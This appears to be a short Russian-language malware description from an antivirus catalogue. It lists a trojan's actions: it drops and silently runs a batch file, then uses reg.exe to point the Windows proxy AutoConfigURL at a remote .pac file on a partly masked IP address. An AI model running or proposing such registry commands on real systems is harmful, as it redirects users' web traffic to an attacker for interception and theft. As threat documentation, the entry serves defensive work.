Техническая информация
- %TEMP%\bt34537.bat
- nul
- %TEMP%\bt34537.bat
- '<SYSTEM32>\cmd.exe' /c %TEMP%\bt34537.bat "<Полный путь к файлу>"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c %TEMP%\bt34537.bat "<Полный путь к файлу>"
- '<SYSTEM32>\reg.exe' query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
- '<SYSTEM32>\findstr.exe' /i /c:"http://45.###.10.111:2019/Xskey.pac"
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL /d "http://45.###.10.111:2019/Xskey.pac" /f